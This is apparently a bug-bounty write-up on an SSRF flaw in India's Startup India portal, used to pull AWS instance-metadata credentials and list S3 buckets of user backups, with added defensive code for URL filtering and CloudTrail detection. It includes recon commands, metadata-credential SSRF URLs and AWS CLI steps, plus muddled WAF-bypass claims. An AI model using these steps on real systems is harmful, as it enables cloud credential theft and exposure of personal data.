Exposing Millions of Investor and Startup Register details and PII INFO in STARTUPINDIA (Govt of INDIA).

Hi, everyone

My name is Santosh Kumar Sha, and I am a security researcher from India (Tinsukia, Assam). In this article I describe how I was able to access millions of startup registration details by exploiting an SSRF to reach the AWS instance metadata service.

I am now offering 1:1 sessions to share my knowledge and expertise:

topmate.io/santosh_kumar_sha

SPECIAL COVID-19 Note:

As the pandemic is not over, please follow COVID norms; we know how devastating it was, so please take care of yourself and the people around you. A special request to my fellow bug-bounty hunters: take care of your health.

TOOLS used for the exploitation

1. Subfinder (https://github.com/projectdiscovery/subfinder)

2. httpx (https://github.com/projectdiscovery/httpx)

3. gau(Corben) — https://github.com/lc/gau

4. waybackurls (tomnomnom) — https://github.com/tomnomnom/waybackurls

What is Startup India Government program:

Startup India is an initiative of the Government of India. The campaign was first announced by Indian Prime Minister Narendra Modi during his speech on 15 August 2015. The action plan of this initiative focuses on three areas, including Simplification and Hand-holding, and Funding Support and Incentives.

The Startup India Scheme is an initiative by the Government of India for the generation of employment and the creation of wealth. The goal of Startup India is the development of innovative products and services and an increase in the employment rate in India.

Story Behind the bug:

This is the write-up of a recent bug I found. I was doing some research with a friend on registering a startup, and while reading the information on https://www.startupindia.gov.in/ I came across a URL while browsing the links. So I started doing recon, gathering all URLs from internet archives using waybackurls and gau, and fuzzed them for SSRF. I found one, but there was some filtering going on behind the server that did not allow me to reach the internal metadata; I bypassed the WAF to access the internal AWS metadata.

Here it goes:

Suppose the target is example.com, where everything is in scope, like this:

In-scope : *.startupindia.gov.in

To gather all the URLs from internet archives I used the waybackurls tool and gau.

Command used:

gau -subs startupindia.gov.in

waybackurls startupindia.gov.in

There is still a chance of missing URLs, so in order to stay ahead of the game and not miss any URL for testing, I also used subfinder and piped its output to waybackurls to get the URLs of every subdomain that exists, saving everything to files.

The final commands look like this:

gau -subs startupindia.gov.in >> vul1.txt

waybackurls startupindia.gov.in >> vul2.txt

subfinder -d startupindia.gov.in -silent | waybackurls >> vul3.txt

Now that we have collected all the URLs, it is time to resolve them, filter out the dead ones, and keep only the URLs that contain query parameters for vulnerability testing. The command looks like this:

cat vul1.txt vul2.txt vul3.txt | grep "=" | sort -u | grep "?" | httpx -silent -http-proxy http://127.0.0.1:8080

After collecting all the URLs I proxied every request through Burp Suite, and while that was running in the background I quickly created a "Match and Replace" rule in Burp to replace the value of any query parameter with my Burp Collaborator payload.

With everything set up, I started browsing startupindia.gov.in, clicking each and every link and endpoint, while Burp replaced every query parameter with the Collaborator payload.

I finally got a hit on my Burp Collaborator server, both an HTTP and a DNS request, from a URL of this form:

https://www.startupindia.gov.in/xxxxx/xxxx?url=http://burpcollabrator.net&details=xxxxx

So I fuzzed further to reach the internal AWS metadata on the vulnerable domain, like this:

https://www.startupindia.gov.in/xxxxx/xxxx?url=http://169.254.169.254/

The above URL returned 200 OK, and I was surprised by the output: there was no WAF/firewall blocking me from reaching the internal data.

The final vulnerable SSRF URL looked like this, and the result was a shocker to me: I had access to the AWS metadata of startupindia. Below is the URL:

https://www.startupindia.gov.in/xxxxx/xxxx?url=http://169.254.169.254/latest/meta-data/
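A server-side check for this class of bug, added here as an example and not code from the original post or from the Startup India application: a fetch endpoint that takes a user-supplied url parameter should resolve the destination and refuse anything in loopback, link-local (which is where 169.254.169.254 lives), private or IPv6 local space, including the bare-decimal and v4-mapped-v6 spellings of the same address. The resolver is injectable so the decision can be tested offline; the host names in the test are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Ranges an outbound fetch from a web application should never reach.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16",     # link-local; 169.254.169.254 is the AWS IMDS
    "0.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10",
    "fd00:ec2::254/128",  # IPv6 address of the AWS IMDS
)]

def is_blocked_ip(addr: str) -> bool:
    """True if an IPv4/IPv6 literal is in a blocked range (v4-mapped v6 is unwrapped)."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETWORKS)

def literal_ip(host: str):
    """Parse dotted, IPv6 or bare-decimal (2852039166 == 169.254.169.254) literals."""
    try:
        return ipaddress.ip_address(int(host) if host.isdigit() else host)
    except ValueError:
        return None

def resolve_all(host: str) -> list:
    """Every address the system resolver returns for host (A and AAAA)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def check_fetch_target(url: str, resolver=resolve_all) -> tuple:
    """Return (allowed, reason) for a user-supplied fetch URL."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    lit = literal_ip(host)
    try:
        addrs = [str(lit)] if lit is not None else resolver(host)
    except (socket.gaierror, KeyError):
        return False, f"cannot resolve {host}"
    for addr in addrs:  # every answer must be safe, not just the first one
        if is_blocked_ip(addr):
            return False, f"{host} -> {addr} is in a blocked range"
    return True, "ok"
```

Because the check resolves at validation time, the actual fetch should connect to the validated address rather than re-resolving the name, and redirects must be re-checked. Requiring IMDSv2 on the instances (its PUT token handshake cannot be driven by a plain GET-based SSRF) removes the credential path even when such a check is missing.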

Now the actual process begins: how I got access to millions of investor and startup registration details and PII in Startup India.

I decided to escalate the SSRF for maximum impact.

Grabbing the AWS metadata via SSRF:

1. To get [AccessKeyId, SecretAccessKey, Token]:

https://www.startupindia.gov.in/xxxxx/xxxx?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/XXXXXX

MY REACTION after SEEING this …..

2. To get [instanceId, accountId, region]. The item to keep in mind is "region": "ap-south-1". Now check for the presence of security credentials; these credentials will lead us to access to the production server.

https://www.startupindia.gov.in/xxxxx/xxxx?url=http://169.254.169.254/latest/dynamic/instance-identity/document

To check whether the credentials are usable we use the AWS CLI. For the next commands, use the data from the above request and the region value retrieved before ("ap-south-1").

$ export AWS_ACCESS_KEY_ID="[AccessKeyId]"
$ export AWS_SECRET_ACCESS_KEY="[SecretAccessKey]"
$ export AWS_DEFAULT_REGION="[region]"
$ export AWS_SESSION_TOKEN="[Token]"

Now it’s time to check the identity of the token.

$ aws sts get-caller-identity
{
    "UserId": "Axxxxxxxxxxxxxxxxx:i-xxxxxxxxxxxxxxxxx",
    "Account": "XXxxxxxxxxxx",
    "Arn": "arn:aws:sts::19xxxxxxxxxx:XXXX/XXXXXX/i-xxxxxxxxxxxxxxxxx"
}

Now I just ran a simple AWS command in the terminal to get the list of all AWS instances. The command used was:

aws s3 ls

The command listed the AWS instances, and among them was the "XXXXXX" instance, so I decided to check it out, again with the AWS CLI:

aws s3 ls s3://XXXXXX

And I was able to access the full list of user backup info files. To be on the safe side, I had already taken permission for further escalation.

I quickly reported the bug, and the next day the report was triaged as critical.
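On the detection side, added here as an example and not part of the original write-up: the get-caller-identity output above shows that credentials taken from the IMDS belong to an EC2 instance-role session whose session name is the instance id (i-...). CloudTrail records that identity and the caller's source address for every API call, so an instance-role session calling from outside the account's own egress addresses is a strong signal that the role credentials have left the instance. The egress range, role ARN and the events below are constructed samples with only the fields the logic uses.

```python
import ipaddress
from typing import Iterable

# Assumed: the public addresses (NAT gateway / EIPs) the account's instances egress through.
KNOWN_EGRESS = [ipaddress.ip_network("203.0.113.0/29")]

def is_instance_role_session(identity: dict) -> bool:
    """True for an AssumedRole session whose session name is an EC2 instance id."""
    if identity.get("type") != "AssumedRole":
        return False
    session_name = identity.get("arn", "").rsplit("/", 1)[-1]
    return session_name.startswith("i-")

def source_is_external(source: str) -> bool:
    """True if the call came from outside KNOWN_EGRESS. Calls made on the caller's
    behalf by an AWS service carry a DNS name instead of an IP and are skipped."""
    if not source or source.endswith(".amazonaws.com"):
        return False
    try:
        ip = ipaddress.ip_address(source)
    except ValueError:
        return False
    return not any(ip in net for net in KNOWN_EGRESS)

def find_exfiltrated_sessions(events: Iterable[dict]) -> list:
    """Return (session_name, source_ip, eventName) for each suspicious call."""
    findings = []
    for ev in events:
        ident = ev.get("userIdentity", {})
        src = ev.get("sourceIPAddress", "")
        if is_instance_role_session(ident) and source_is_external(src):
            findings.append((ident["arn"].rsplit("/", 1)[-1], src, ev.get("eventName")))
    return findings

# Constructed CloudTrail records: one legitimate call from the NAT address, two calls
# by the same instance session from an outside address, an IAM user, and a service call.
ROLE_ARN = "arn:aws:sts::111122223333:assumed-role/WebAppInstanceRole/i-0abc123def456789a"
SAMPLE_EVENTS = [
    {"eventName": "DescribeInstances", "sourceIPAddress": "203.0.113.5",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN}},
    {"eventName": "GetCallerIdentity", "sourceIPAddress": "198.51.100.23",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN}},
    {"eventName": "ListBuckets", "sourceIPAddress": "198.51.100.23",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN}},
    {"eventName": "ListBuckets", "sourceIPAddress": "198.51.100.23",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/analyst"}},
    {"eventName": "PutObject", "sourceIPAddress": "lambda.amazonaws.com",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN}},
]

if __name__ == "__main__":
    for session, ip, name in find_exfiltrated_sessions(SAMPLE_EVENTS):
        print(f"ALERT: instance-role session {session} used from {ip} ({name})")
```

The same two events would also trip GuardDuty's instance credential exfiltration finding; running the logic yourself is useful where GuardDuty is not enabled or where the egress set is known precisely.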

TimeLine:

Nov 27, 2021, 12:25 AM: Reported

Nov 27, 2021, 12:35 PM: A ticket was assigned.

Dec 22, 2021: The issue was resolved (retested)

Dec 22, 2021: Acknowledged by STARTUP INDIA.

Takeaway:

I'm sure a lot of security researchers have already seen this process, but this is how I approached bypassing the firewall to get the AWS metadata through SSRF. So never stop when you come across filtering, a firewall or a WAF, because there are ways around them, and always try to escalate a bug to increase its impact for higher bounties.

That's one of the reasons why I wanted to share my experience, and also to highlight other techniques for exploiting such vulnerabilities.

Support me if you like my work! Buy me a coffee and Follow me on Twitter.

Thanks for reading :)
Stay Safe.

https://twitter.com/killmongar1996


Santosh Kumar Sha (@killmongar1996)

Cloud Security | Security Researcher | Pentester | Bugbounty hunter | VAPT | Penetration tester | CTF player | topmate.io/santosh_kumar_sha